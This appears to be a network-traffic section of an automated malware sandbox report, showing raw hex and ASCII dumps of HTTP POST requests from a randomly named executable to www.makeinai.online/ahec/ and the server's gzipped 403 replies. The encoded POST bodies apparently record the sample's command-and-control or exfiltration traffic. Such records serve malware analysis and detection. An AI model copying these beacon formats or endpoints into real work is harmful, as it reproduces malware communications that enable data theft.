                                                                          Data Ascii: KHcH=Bw1JIdbMW2KoP3S+NZmJ03OWDSCezIolVMEsw1YH2Azi/Fd6vTJrgPU/UlwWFEg8Xsii87Zr+UENeHy6QkGik3OVQ+COfuV7uhlBZ7DyUdxLcPTo8U7EdpUznktEUvT8lSvrLoeVpqT19l6mxTwJuq8LuYEsFjz2asRWv+nfbZvZBGFg8i9P42C9SiqtRu9ZGQsxeg8=
                                                                          Dec 2, 2023 18:48:46.584605932 CET1340INHTTP/1.1 403 Forbidden
                                                                          Server: nginx
                                                                          Date: Sat, 02 Dec 2023 17:48:46 GMT
                                                                          Content-Type: text/html
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          Vary: Accept-Encoding
                                                                          ETag: W/"64f9f107-377d8"
                                                                          Content-Encoding: gzip
                                                                          Data Raw: 36 30 30 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec bd ef 8e db 48 b2 2f f8 7d 9e 42 a5 83 b6 a5 31 a5 e2 7f 52 92 e9 9a 9e 1e f7 99 c6 99 9e 6e 8c fb f4 60 51 63 08 2c 89 2a b1 4d 89 ba 24 55 e5 72 b9 0e ee dd 27 d9 af fb ed ec 05 16 d8 c5 ee de 05 f6 09 e6 bc d1 46 44 92 14 ff 4a 49 51 e5 6a fb 4c 75 5b a2 c8 cc 88 cc c8 c8 c8 5f 44 06 c9 97 67 73 7f 16 dd 6d 9c ce 32 5a 79 af 5e e2 67 c7 b3 d7 d7 56 d7 59 77 e1 b7 63 cf 5f bd 5c 39 91 dd 99 2d ed 20 74 22 ab fb af 3f 7d 3b 30 e1 5a e4 46 9e f3 ea ef ff cb df ff fd ef ff db df ff c7 7f fc cf 7f ff f7 ce 7f fc 37 f8 f1 7f d2 e1 df ff fb 7f fc d7 bf ff ef 7f ff bf e1 df ff 03 ff fd 8f ce df ff 5f 38 f1 7f 40 c1 ff 86 d7 f1 d4 df ff fb df ff 2f ba fc ef 2f cf 19 b1 97 61 74 e7 39 9d 95 33 77 6d ab 6b 7b 5e f7 d5 f9 6f cf 7e fb b9 ff 9d fd f6 6f bf e9 74 b0 1f 9d 59 18 76 86 e7 6b 7f ee 4c 57 fe 7c eb 39 e1 39 9c 1a 78 be 3d 77 82 73 77 3d 77 de 0f 7f 09 2f 2e 66 9e bf 76 e6 7f 81 02 6f 9c 68 a0 0f b7 a1 73 29 bd 3d 2b 54 dd f8 61 94 a9 1e 06 b3 94 44 b1 28 fc 4b cb cd dd 30 3a 9f fd 12 b2 62 57 ce ea fc ca f3 67 ef c2 a1 3d b7 37 91 7b e3 9c 5f 0d 36 f6 75 f2 35 c4 ba 1d ec 07 f4 e2 6f 4f 2d cc d6 7f e7 bf 19 b2 7e dd 83 1c 36 9e 7d 37 5e 78 ce fb 09 7e 0c e6 6e e0 cc 22 d7 5f 8f 67 be b7 5d ad 27 b7 ee 3c 5a 8e 25 51 fc 6a b2 72 d7 03 f6 53 91 c5 cd fb c9 d2 71 af 97 11 bb b6 b1 e7 73 77 7d 3d d6 8c cd fb 8e d8 11 27 2b 3b b8 76 d7 63 71 02 74 fc 60 fc 4f 8a ae c2 ff 93 85 bf 86 1a 32 14 fa 6e 1d 39 81 f0 75 e0 da 9e f0 47 c7 bb 71 22 77 66 77 fe ec 6c 9d dd 4f e1 db c0 71 de d8 eb 50 08 e1 63 10 3a 81 bb 98 5c d9 b3 77 d7 81 bf 5d cf c7 ff b4 58 2c 26 83 5b e7 ea 9d 1b 0d 22 7b 33 58 42 8b 3c 6c d5 80 b1 8d 02 a8 b7 b1 03 67 1d 3d e0 d4 1e af fd a8 37 74 c3 69 32 d0 fd 4e 22 0b ff c6 09 16 9e 7f 3b 78 3f 5e ba f3 b9 b3 7e f8 1d 4d c3 4e 6f d7 6f 49 94 d5 cd fb fe 7d 96 c2 1e 02 0f f1 a5 29 1a 98 29 34 e3 1d 88 e8 1e c9 ed 44 77 b3 cc 97 72 82 c0 0f 18 c1 44 a6 e2 81 a6 4f 57 ce 7a 3b c0 c2 38 70 70 7d ee cc 85 e6 55 06 f6 0c cb 24 6c 07 91 bf 01 d6 cd 84 50 45 b7 40 f0 a1 61 13 24 d4 b5 13 34 a3 ba 7b 87 b4 22 57 3a 33 03 46 23 1d 5a 75 40 c8 70 c5 5d dc 0d ae 02 ff 16 54 77 7a e3 86 ee 95 97 a7 a9 a9 8d 3b 77 a0 4d 95 f2 e0 6d c9 6e 70 fc 2b d7 73 06 89 4e 4f 99 46 0b c9 e5 70 7b 85 22 9e fa 1b 07 ac 74 aa fa 89 e2 1f 90 cb 74 e1 fb 30 f9 07 73 ff 76 7d 50 51 ab 1b 72 a0 56 5d fb e2 8e 37 55 a7 43 e4 1a ab 67 65 a7 2a e8 0e dd dd b0 27 c6 9a 96 aa 87 2a 59 de a3 09 1f 4b 60 7f ed 6d e4 4f 8a a3 92 21 96 af 96 b7 48 5f 35 ed 4d 8e 56 45 1f 2a 8a 4d d3 ae 27 aa 58 aa 57 ac 06 9d a8 66 09 a6 1e 96 92 75 94 6a f3 95 1f 45 fe 0a 26 77 1d 09 f6 33 15 e8 1a 90 c6 ae 6c 4c 6d 70 1b d8 9b 0d 94 4a 16 32 92 69 6d b1 29 01 b7 29 82 8f 4c 4b 02 92 29 8a 2e 59 20 07 9e b3 60 67 f8 48 4d d7 ce 6d 81 9c 6a 16 c9 e1 99 83 73 ae d8 af 06 76 ac 49 67 c5 7c d3 1a 2f 20 7b db c9 55 a3 51 eb 1a 77 9d 16 e9 25 c0 4e 24 12 46 36 c0 94 b8 89 a6 78 c4 42 d5 98 fe 4e 6d 92 e5 2d 3b 7d 75 71 a7 1b f4 83 b0 98 07 70 77 40 52 19 20 79 a6 f0 87 3a 9e 92 4f 61 48 8a e9 3a 03 49 63 a4 1b 77 97 8f 6a b9 93 bb e9 58 00 a1 3b 3a 3b 5c 18 83 bf 7f 5a c8 0b 75 31 e2 ee 69 05 0f a6 76 c7 76 b2 96 60 45 ff c8 ff 03 03
                                                                          Data Ascii: 6000H/}B1Rn`Qc,*M$Ur'FDJIQjLu[_Dgsm2Zy^gVYwc_\9- t"?};0ZF7_8@//at93wmk{^o~otYvkLW|99x=wsw=w/.fvohs)=+TaD(K0:bWg=7{_6u5oO-~6}7^x~n"_g]'<Z%QjrSqsw}='+;vcqt`O2n9uGq"wfwlOqPc:\w]X,&["{3XB<lg=7ti2N";x?^~MNooI}))4DwrDOWz;8pp}U$lPE@a$4{"W:3F#Zu@p]Twz;wMmnp+sNOFp{"tt0sv}PQrV]7UCge*'*YK`mO!H_5MVE*M'XWfujE&w3lLmpJ2im))LK).Y `gHMmjsvIg|/ {UQw%N$F6xBNm-;}uqpw@R y:OaH:IcwjX;:;\Zu1ivv`E
                                                                          Dec 2, 2023 18:48:46.584623098 CET1340INData Raw: ee db d1 18 75 93 21 65 43 14 3b d8 cd 73 45 6c 03 99 3d 77 ed 24 2a a2 99 59 db 93 e7 3f 80 82 ef ee 23 e7 7d 34 98 3b 33 3f b0 c9 13 c8 db c7 8a 1a e3 25 5a ef 52 3d 18 09 27 40 d6 75 95 51 62 ac df 89 29 76 d7 35 e5 dd c8 59 dd 83 b7 47 bf c6
                                                                          Data Ascii: u!eC;sEl=w$*Y?#}4;3?%ZR='@uQb)v5YG(I~.';<N6Nz$*jvn^_aVa5Nmz]R0T=j0d9v0E|9-Eq=%l)MF1qax
                                                                          Dec 2, 2023 18:48:46.585444927 CET1340INData Raw: 83 53 15 67 c3 f2 c9 d2 89 2b ff 3d ce 61 5c 32 52 13 f6 be 18 25 f3 37 91 bb 82 59 fd 27 70 41 ae 5c cf 8d ee 1e 52 79 0b e9 d1 98 65 fd 65 4e c4 7b d5 18 81 63 6b c7 50 96 c3 8e 63 87 ce c0 5d 0f fc 6d b4 23 73 09 c3 63 83 1f 31 7f bb ab 3f c5
                                                                          Data Ascii: Sg+=a\2R%7Y'pA\RyeeN{ckPc]m#sc1?g\I6KzQqCua'c'{23^bx%)orLBPIzIDVdB(^ -.,#4~>#FU!e%_RM@&D=~^5tW^b{%QV68o}
                                                                          Dec 2, 2023 18:48:46.585459948 CET1340INData Raw: ad 53 c1 60 6e 1e 8f 19 da 7d 2c 49 f1 02 dd 83 d5 0f c0 db 83 f5 0f 80 da cc 0d 3c ec 19 33 9b c0 5d d9 c1 dd 7d f9 bd 09 a2 38 13 4d b5 ae 42 56 82 f8 28 04 7a 5a 80 50 53 38 7e 96 40 15 8f b9 3d d2 eb 78 c4 8f 28 a8 ac 67 1b 86 5c 57 6f b0 76
                                                                          Data Ascii: S`n},I<3]}8MBV(zZPS8~@=x(g\WovnRlw?46-T,XhlDUvU}OdVxoMm-?(^]#3,5UJ1EY!9$cE->i*MoUWeA!
                                                                          Dec 2, 2023 18:48:46.585773945 CET1340INData Raw: a0 c5 7a e9 e3 b8 f3 4d 36 5a bd 4a 2c df e4 e4 e9 ca 75 ac 0f 34 5d 2f b7 9c 1e 8a 9f 36 18 53 1f cf f5 56 2f 07 cb 37 38 79 c6 78 81 e3 81 76 8e ca dd bc 72 af 85 32 9d b2 c8 a9 07 da 09 b5 24 79 a6 70 be 2d 15 1d d8 d3 bc 03 dd ad 10 12 3e 48
                                                                          Data Ascii: zM6ZJ,u4]/6SV/78yxvr2$yp->H?r%G\U'T_dR!VIV0kgWsYe,BNP m\zAC9g3<_ms+E}&w3bY!Tb
                                                                          Dec 2, 2023 18:48:46.585823059 CET1340INData Raw: 8e 4f b6 88 a4 cf bc 7d 88 f9 c6 5f 87 1e 99 87 45 76 2e 60 6c 56 4e ed 5b 9b d5 dc b2 cf 73 cb 37 55 28 17 de df 9f 03 1c 32 fd 3a a5 5b 5d e6 ba 7b 34 ed c9 1d dd f4 41 b8 39 66 bc 32 4c 9e 60 5b 2f c2 fd f4 33 9d 3a a5 8f 5b 66 9a 3e 45 f6 e4
                                                                          Data Ascii: O}_Ev.`lVN[s7U(2:[]{4A9f2L`[/3:[f>E*W_z)2fO3s`\z'Vk'wOG)>3[`+e,U=Tfy]lNhs\3<((5a
                                                                          Dec 2, 2023 18:48:46.586472988 CET1340INData Raw: 86 9a a6 75 c4 81 6e 0e 14 71 a8 aa 2a 1e e9 66 48 3f 34 38 ea d0 ef 19 15 84 da f0 b3 c3 0a 76 e8 5a 38 48 7f b1 c2 1f 9e 9f b3 be ce dc 60 e6 39 e5 de ce de 5b cf 59 5b e0 f8 2e 3e 36 9e 77 02 eb b9 2e 0d 65 51 4e 08 e4 85 f5 ed b7 df 32 49 8d
                                                                          Data Ascii: unq*fH?48vZ8H`9[Y[.>6w.eQN2I('eh<gMJks(*@2#?;O!9%|*JDj+( Pe:Gz%XT+$IUWT?Pp*#X?|oC;645g*Aq
                                                                          Dec 2, 2023 18:48:46.586488008 CET1340INData Raw: 8b 03 75 c1 08 13 5c d7 b1 77 20 59 b4 33 e2 c8 08 61 89 c0 a5 43 03 eb 05 67 74 5a b9 0c 05 9d 26 13 87 0a 5d 0a c3 40 c7 40 87 d1 95 d0 62 ca 60 83 35 e8 0d ac 9f b0 1c c3 a7 6c a0 af 23 2b e8 8a 28 84 2f 68 71 90 45 30 7f b0 1e 82 d4 c0 a2 c1
                                                                          Data Ascii: u\w Y3aCgtZ&]@@b`5l#+(/hqE0?4,^pl_`4UV/6y+5s'dp#jZB3`/C~92u02s2p"T5iP+0Awd_FudDRZ4i&p<$bPE{ |
                                                                          Dec 2, 2023 18:48:46.587069988 CET1340INData Raw: 67 a9 84 fe 61 a5 ea 60 f4 d0 29 1e 61 84 09 b7 51 60 8a ea 36 4e 0c 59 eb c4 5f 24 08 05 1d 26 84 4d b2 e9 01 30 20 ef 55 c3 d0 12 46 09 75 09 e3 63 d4 4b 99 42 82 06 6d 3a 89 60 bf d0 01 42 b9 23 1c c3 58 fb 60 48 3f 45 d4 46 2c ae e0 74 05 8d
                                                                          Data Ascii: ga`)aQ`6NY_$&M0 UFucKBm:`B#X`H?EF,t6F:#FNeh9u-&$"m_=QPE<BA(B@9TGr}o8ZqZ1p}3"4\hR!&RAdf0m L^(WGn`74]@H<a
                                                                          Dec 2, 2023 18:48:46.587085962 CET1340INData Raw: 8d d5 5a 2a d2 8d 64 2c 07 8a f4 a1 7a 13 53 14 bf 36 46 7f 88 4d 3a e6 dc 76 24 dc 99 c7 cd 20 5d c1 94 3b 53 5d d2 76 7f 4d fd 74 13 d4 c4 54 0f 1d e3 8b 7f 84 5a 8a 6e ab 2a 6d 6d c5 5f b4 95 81 d9 19 18 94 9d 89 14 18 67 3b 31 22 6e 9c 9a 94
                                                                          Data Ascii: Z*d,zS6FM:v$ ];S]vMtTZn*mm_g;1"no5,esn$f@Sbjq6I!8P4`7:}d&li_YQBk0Kg(h51nU<})MS:&G
                                                                          Dec 2, 2023 18:48:46.804873943 CET1340INData Raw: fe 56 51 ca b7 c3 e0 ed 84 72 27 9e 76 26 0a 19 d3 b6 4c cd a0 4f f3 6b 95 ee b5 60 9f 98 01 06 33 73 04 eb 84 3e d4 fe 88 93 01 6f e8 10 55 98 bc a6 22 79 54 a3 43 9f 76 b1 1e bb 06 96 c4 94 59 e9 1b bc 2f 5c a1 29 a7 fe 0c c7 ba 61 d8 0a dd 54
                                                                          Data Ascii: VQr'v&LOk`3s>oU"yTCvY/\)aT><M8d(}u3 ?(DUa7g'yC@*}4_}WKB~|lR)s1%rbEA/O34Pksj6fVIo


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          11192.168.2.54973037.140.192.89801600C:\Program Files (x86)\dLeRhwtaQoqFGcffDaFNqRqHSzFuxNdiNwlQivrH\AQhPMwWbqUlSTgiqGOPNvqG.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Dec 2, 2023 18:48:49.103190899 CET1830OUTPOST /ahec/ HTTP/1.1
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Host: www.makeinai.online
                                                                          Origin: http://www.makeinai.online
                                                                          Referer: http://www.makeinai.online/ahec/
                                                                          Cache-Control: no-cache
                                                                          Content-Length: 1217
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Connection: close
                                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                          Data Raw: 4b 48 63 48 3d 42 77 31 4a 49 64 62 4d 57 32 4b 6f 50 33 53 2b 4e 5a 6d 4a 30 33 4f 57 44 53 43 65 7a 49 6f 6c 56 4d 45 73 77 31 59 48 32 41 37 69 2f 58 56 36 76 79 4a 72 6e 50 55 2f 64 46 77 56 46 45 68 6b 58 73 36 6d 38 37 63 63 2b 53 49 4e 59 68 4f 36 59 31 47 69 71 33 4f 56 63 65 43 50 41 65 56 75 75 68 30 47 5a 2f 6e 79 55 64 78 4c 63 4d 37 6f 31 6c 37 45 66 70 55 77 6d 6b 74 2b 66 50 53 52 6c 54 47 57 4c 70 65 76 71 63 6a 31 39 42 57 6d 39 46 45 4a 6e 71 38 4e 74 59 46 71 46 6a 33 54 61 76 30 74 76 37 61 30 62 62 76 5a 44 44 49 43 34 32 6c 58 73 32 36 61 41 51 54 35 42 4c 39 68 53 44 38 74 46 55 61 73 67 4d 75 5a 55 73 41 36 6b 68 53 74 6e 77 66 4b 58 74 63 2f 34 69 50 6c 4e 46 75 49 4e 38 64 4f 57 35 70 74 4f 42 68 41 66 33 42 77 73 77 39 53 36 4d 51 68 6b 52 38 76 38 57 33 70 62 48 5a 4b 56 49 7a 45 69 51 4e 49 4b 59 43 38 38 6c 2b 54 59 78 65 79 51 79 36 42 65 6a 67 47 4f 49 35 4f 74 56 63 41 67 71 4c 67 4b 69 42 44 44 4d 72 6d 77 6a 39 48 43 49 50 49 33 6d 4c 51 43 6d 4a 4a 45 58 42 36 33 34 46 75 78 59 4b 4f 65 71 44 76 38 55 69 45 57 2f 73 51 58 46 34 48 34 73 48 75 69 49 30 48 6c 6a 51 4c 6e 68 33 42 78 71 56 67 46 45 4d 55 4c 38 2b 44 65 4a 4a 45 58 49 36 4d 62 5a 34 36 67 77 6d 51 48 5a 77 75 6d 59 68 33 33 48 62 46 70 50 42 4c 73 67 2b 6d 74 54 75 35 4d 56 64 4b 73 43 45 4f 74 4a 32 62 63 2f 75 39 67 56 39 51 4d 33 73 4a 37 2f 47 42 46 41 4c 78 35 52 38 30 77 64 54 64 36 4b 36 56 37 70 4a 34 32 50 71 36 65 5a 45 30 78 38 5a 37 59 73 65 65 6d 46 70 73 65 50 73 75 73 55 32 4a 33 6f 34 41 73 75 6a 33 63 36 4a 72 54 42 62 74 49 62 43 49 59 6d 4a 76 52 2b 67 32 4e 78 6f 6d 73 75 59 66 69 55 78 52 6b 43 66 37 45 6f 76 74 45 6f 48 49 34 66 2b 6c 30 37 78 72 6d 63 4c 42 4a 4b 46 53 36 64 41 4a 59 32 6e 37 6a 43 30 76 38 37 35 77 42 33 69 75 2b 47 35 62 37 67 73 43 36 35 66 71 4e 34 6f 34 50 36 74 31 48 54 78 71 48 54 44 47 52 32 33 6a 58 41 70 68 74 35 7a 49 47 75 70 63 6c 39 77 47 6d 2f 77 2f 36 31 68 74 4a 58 78 77 4e 4b 64 6a 5a 4d 46 47 59 58 42 63 41 51 6d 51 63 6b 72 71 4f 2f 76 46 56 58 68 38 37 4b 46 39 70 31 43 4b 5a 4a 56 4c 4a 59 62 4f 78 38 54 4a 73 4b 79 61 69 32 2f 57 51 4f 41 73 54 54 37 32 58 6d 6a 7a 6c 78 41 70 55 65 6f 2b 2b 72 37 61 2f 43 71 58 52 6e 52 62 38 70 6d 74 50 47 6e 53 67 45 34 6e 4a 53 30 6e 58 54 6e 6b 62 45 41 66 4d 63 4d 4a 4a 42 54 5a 53 5a 6a 39 70 52 44 64 30 51 54 68 30 79 4f 62 2b 46 63 4f 70 46 48 77 34 59 47 6d 76 45 67 68 54 36 55 47 50 31 53 67 38 43 71 70 41 4d 2f 77 44 5a 56 6a 2f 4b 65 4e 73 63 7a 71 49 4a 76 6c 4d 50 74 45 52 36 51 36 39 35 6b 65 38 4e 66 62 47 76 43 65 6c 78 75 57 51 51 2f 5a 2f 4e 59 4e 2b 6c 76 6e 64 50 6f 72 41 45 32 5a 68 76 4e 78 46 67 41 37 2b 58 52 31 34 47 77 55 4e 58 4f 77 77 62 39 58 57 71 54 59 37 46 34 32 6f 4d 74 65 78 47 59 56 38 41 54 46 5a 32 2f 45 52 51 59 52 73 4c 56 73 38 2f 4e 37 76 31 63 5a 65 32 37 59 32 6a 6f 76 4e 78 71 34 32 45 32 53 61 2f 74 7a 6c 6e 78 55 37 31 37 34 42 6f 65 46 45 6e 6e 77 49 6e 6f 79 2f 2b 57 39 75 71 4b 59 65 67 57 43 46 78 49 4a 6b 68 6b 73 69 55 56 76 74 44 71 58 6c 67 49 6a 63 72 52 6b 75 66 53 69 49 38 4d 65 58 57 62 55 41 35 4a 78 39 74 43 46 7a 71 7a 6a 45 57 73 65 69 35 6e 71 66 65 5a 36 54 69 70 35 2f 34 36 4a 47 43 66 44 2f 31 4f 6e 4b 6d 30 78 37 56 79 74 4f 34 4f 34 2f 2f 6f 6a 4f 46 6b 71 64 70 72 37 6e 51 30 71 35 69 76 4e 69 79 54 2b 45 39 7a 72 56 49 50 68 45 36 78 32 65 71 4f 75 41 4a 33 57 4c 62 30 33 6a 67 47 36 68 65 4a 62 72 58 71 4f 58 74 78 4c 2b 56 37 6d 48 72 39 63 66 75 75 38 58 37 78 61 53 48 34 6e 79 6f 45 4e 52 6e 46 57 43 67 64 4c 34 71 34 38 73 75 32 37 4b 53 32 53 56 2f 51 79 75 75 58 49 36 70 4b 39 58 4d 72 31 77 69 75 4c 4e 30 30 70
                                                                          Data Ascii: KHcH=Bw1JIdbMW2KoP3S+NZmJ03OWDSCezIolVMEsw1YH2A7i/XV6vyJrnPU/dFwVFEhkXs6m87cc+SINYhO6Y1Giq3OVceCPAeVuuh0GZ/nyUdxLcM7o1l7EfpUwmkt+fPSRlTGWLpevqcj19BWm9FEJnq8NtYFqFj3Tav0tv7a0bbvZDDIC42lXs26aAQT5BL9hSD8tFUasgMuZUsA6khStnwfKXtc/4iPlNFuIN8dOW5ptOBhAf3Bwsw9S6MQhkR8v8W3pbHZKVIzEiQNIKYC88l+TYxeyQy6BejgGOI5OtVcAgqLgKiBDDMrmwj9HCIPI3mLQCmJJEXB634FuxYKOeqDv8UiEW/sQXF4H4sHuiI0HljQLnh3BxqVgFEMUL8+DeJJEXI6MbZ46gwmQHZwumYh33HbFpPBLsg+mtTu5MVdKsCEOtJ2bc/u9gV9QM3sJ7/GBFALx5R80wdTd6K6V7pJ42Pq6eZE0x8Z7YseemFpsePsusU2J3o4Asuj3c6JrTBbtIbCIYmJvR+g2NxomsuYfiUxRkCf7EovtEoHI4f+l07xrmcLBJKFS6dAJY2n7jC0v875wB3iu+G5b7gsC65fqN4o4P6t1HTxqHTDGR23jXApht5zIGupcl9wGm/w/61htJXxwNKdjZMFGYXBcAQmQckrqO/vFVXh87KF9p1CKZJVLJYbOx8TJsKyai2/WQOAsTT72XmjzlxApUeo++r7a/CqXRnRb8pmtPGnSgE4nJS0nXTnkbEAfMcMJJBTZSZj9pRDd0QTh0yOb+FcOpFHw4YGmvEghT6UGP1Sg8CqpAM/wDZVj/KeNsczqIJvlMPtER6Q695ke8NfbGvCelxuWQQ/Z/NYN+lvndPorAE2ZhvNxFgA7+XR14GwUNXOwwb9XWqTY7F42oMtexGYV8ATFZ2/ERQYRsLVs8/N7v1cZe27Y2jovNxq42E2Sa/tzlnxU7174BoeFEnnwInoy/+W9uqKYegWCFxIJkhksiUVvtDqXlgIjcrRkufSiI8MeXWbUA5Jx9tCFzqzjEWsei5nqfeZ6Tip5/46JGCfD/1OnKm0x7VytO4O4//ojOFkqdpr7nQ0q5ivNiyT+E9zrVIPhE6x2eqOuAJ3WLb03jgG6heJbrXqOXtxL+V7mHr9cfuu8X7xaSH4nyoENRnFWCgdL4q48su27KS2SV/QyuuXI6pK9XMr1wiuLN00p
                                                                          Dec 2, 2023 18:48:49.331998110 CET1340INHTTP/1.1 403 Forbidden
                                                                          Server: nginx
                                                                          Date: Sat, 02 Dec 2023 17:48:49 GMT
                                                                          Content-Type: text/html
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          Vary: Accept-Encoding
                                                                          ETag: W/"64f9f107-377d8"
                                                                          Content-Encoding: gzip
                                                                          Data Raw: 36 30 30 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec bd ef 8e db 48 b2 2f f8 7d 9e 42 a5 83 b6 a5 31 a5 e2 7f 52 92 e9 9a 9e 1e f7 99 c6 99 9e 6e 8c fb f4 60 51 63 08 2c 89 2a b1 4d 89 ba 24 55 e5 72 b9 0e ee dd 27 d9 af fb ed ec 05 16 d8 c5 ee de 05 f6 09 e6 bc d1 46 44 92 14 ff 4a 49 51 e5 6a fb 4c 75 5b a2 c8 cc 88 cc c8 c8 c8 5f 44 06 c9 97 67 73 7f 16 dd 6d 9c ce 32 5a 79 af 5e e2 67 c7 b3 d7 d7 56 d7 59 77 e1 b7 63 cf 5f bd 5c 39 91 dd 99 2d ed 20 74 22 ab fb af 3f 7d 3b 30 e1 5a e4 46 9e f3 ea ef ff cb df ff fd ef ff db df ff c7 7f fc cf 7f ff f7 ce 7f fc 37 f8 f1 7f d2 e1 df ff fb 7f fc d7 bf ff ef 7f ff bf e1 df ff 03 ff fd 8f ce df ff 5f 38 f1 7f 40 c1 ff 86 d7 f1 d4 df ff fb df ff 2f ba fc ef 2f cf 19 b1 97 61 74 e7 39 9d 95 33 77 6d ab 6b 7b 5e f7 d5 f9 6f cf 7e fb b9 ff 9d fd f6 6f bf e9 74 b0 1f 9d 59 18 76 86 e7 6b 7f ee 4c 57 fe 7c eb 39 e1 39 9c 1a 78 be 3d 77 82 73 77 3d 77 de 0f 7f 09 2f 2e 66 9e bf 76 e6 7f 81 02 6f 9c 68 a0 0f b7 a1 73 29 bd 3d 2b 54 dd f8 61 94 a9 1e 06 b3 94 44 b1 28 fc 4b cb cd dd 30 3a 9f fd 12 b2 62 57 ce ea fc ca f3 67 ef c2 a1 3d b7 37 91 7b e3 9c 5f 0d 36 f6 75 f2 35 c4 ba 1d ec 07 f4 e2 6f 4f 2d cc d6 7f e7 bf 19 b2 7e dd 83 1c 36 9e 7d 37 5e 78 ce fb 09 7e 0c e6 6e e0 cc 22 d7 5f 8f 67 be b7 5d ad 27 b7 ee 3c 5a 8e 25 51 fc 6a b2 72 d7 03 f6 53 91 c5 cd fb c9 d2 71 af 97 11 bb b6 b1 e7 73 77 7d 3d d6 8c cd fb 8e d8 11 27 2b 3b b8 76 d7 63 71 02 74 fc 60 fc 4f 8a ae c2 ff 93 85 bf 86 1a 32 14 fa 6e 1d 39 81 f0 75 e0 da 9e f0 47 c7 bb 71 22 77 66 77 fe ec 6c 9d dd 4f e1 db c0 71 de d8 eb 50 08 e1 63 10 3a 81 bb 98 5c d9 b3 77 d7 81 bf 5d cf c7 ff b4 58 2c 26 83 5b e7 ea 9d 1b 0d 22 7b 33 58 42 8b 3c 6c d5 80 b1 8d 02 a8 b7 b1 03 67 1d 3d e0 d4 1e af fd a8 37 74 c3 69 32 d0 fd 4e 22 0b ff c6 09 16 9e 7f 3b 78 3f 5e ba f3 b9 b3 7e f8 1d 4d c3 4e 6f d7 6f 49 94 d5 cd fb fe 7d 96 c2 1e 02 0f f1 a5 29 1a 98 29 34 e3 1d 88 e8 1e c9 ed 44 77 b3 cc 97 72 82 c0 0f 18 c1 44 a6 e2 81 a6 4f 57 ce 7a 3b c0 c2 38 70 70 7d ee cc 85 e6 55 06 f6 0c cb 24 6c 07 91 bf 01 d6 cd 84 50 45 b7 40 f0 a1 61 13 24 d4 b5 13 34 a3 ba 7b 87 b4 22 57 3a 33 03 46 23 1d 5a 75 40 c8 70 c5 5d dc 0d ae 02 ff 16 54 77 7a e3 86 ee 95 97 a7 a9 a9 8d 3b 77 a0 4d 95 f2 e0 6d c9 6e 70 fc 2b d7 73 06 89 4e 4f 99 46 0b c9 e5 70 7b 85 22 9e fa 1b 07 ac 74 aa fa 89 e2 1f 90 cb 74 e1 fb 30 f9 07 73 ff 76 7d 50 51 ab 1b 72 a0 56 5d fb e2 8e 37 55 a7 43 e4 1a ab 67 65 a7 2a e8 0e dd dd b0 27 c6 9a 96 aa 87 2a 59 de a3 09 1f 4b 60 7f ed 6d e4 4f 8a a3 92 21 96 af 96 b7 48 5f 35 ed 4d 8e 56 45 1f 2a 8a 4d d3 ae 27 aa 58 aa 57 ac 06 9d a8 66 09 a6 1e 96 92 75 94 6a f3 95 1f 45 fe 0a 26 77 1d 09 f6 33 15 e8 1a 90 c6 ae 6c 4c 6d 70 1b d8 9b 0d 94 4a 16 32 92 69 6d b1 29 01 b7 29 82 8f 4c 4b 02 92 29 8a 2e 59 20 07 9e b3 60 67 f8 48 4d d7 ce 6d 81 9c 6a 16 c9 e1 99 83 73 ae d8 af 06 76 ac 49 67 c5 7c d3 1a 2f 20 7b db c9 55 a3 51 eb 1a 77 9d 16 e9 25 c0 4e 24 12 46 36 c0 94 b8 89 a6 78 c4 42 d5 98 fe 4e 6d 92 e5 2d 3b 7d 75 71 a7 1b f4 83 b0 98 07 70 77 40 52 19 20 79 a6 f0 87 3a 9e 92 4f 61 48 8a e9 3a 03 49 63 a4 1b 77 97 8f 6a b9 93 bb e9 58 00 a1 3b 3a 3b 5c 18 83 bf 7f 5a c8 0b 75 31 e2 ee 69 05 0f a6 76 c7 76 b2 96 60 45 ff c8 ff 03 03
                                                                          Data Ascii: 6000H/}B1Rn`Qc,*M$Ur'FDJIQjLu[_Dgsm2Zy^gVYwc_\9- t"?};0ZF7_8@//at93wmk{^o~otYvkLW|99x=wsw=w/.fvohs)=+TaD(K0:bWg=7{_6u5oO-~6}7^x~n"_g]'<Z%QjrSqsw}='+;vcqt`O2n9uGq"wfwlOqPc:\w]X,&["{3XB<lg=7ti2N";x?^~MNooI}))4DwrDOWz;8pp}U$lPE@a$4{"W:3F#Zu@p]Twz;wMmnp+sNOFp{"tt0sv}PQrV]7UCge*'*YK`mO!H_5MVE*M'XWfujE&w3lLmpJ2im))LK).Y `gHMmjsvIg|/ {UQw%N$F6xBNm-;}uqpw@R y:OaH:IcwjX;:;\Zu1ivv`E
                                                                          Dec 2, 2023 18:48:49.332020998 CET1340INData Raw: ee db d1 18 75 93 21 65 43 14 3b d8 cd 73 45 6c 03 99 3d 77 ed 24 2a a2 99 59 db 93 e7 3f 80 82 ef ee 23 e7 7d 34 98 3b 33 3f b0 c9 13 c8 db c7 8a 1a e3 25 5a ef 52 3d 18 09 27 40 d6 75 95 51 62 ac df 89 29 76 d7 35 e5 dd c8 59 dd 83 b7 47 bf c6
                                                                          Data Ascii: u!eC;sEl=w$*Y?#}4;3?%ZR='@uQb)v5YG(I~.';<N6Nz$*jvn^_aVa5Nmz]R0T=j0d9v0E|9-Eq=%l)MF1qax
                                                                          Dec 2, 2023 18:48:49.332695007 CET1340INData Raw: 83 53 15 67 c3 f2 c9 d2 89 2b ff 3d ce 61 5c 32 52 13 f6 be 18 25 f3 37 91 bb 82 59 fd 27 70 41 ae 5c cf 8d ee 1e 52 79 0b e9 d1 98 65 fd 65 4e c4 7b d5 18 81 63 6b c7 50 96 c3 8e 63 87 ce c0 5d 0f fc 6d b4 23 73 09 c3 63 83 1f 31 7f bb ab 3f c5
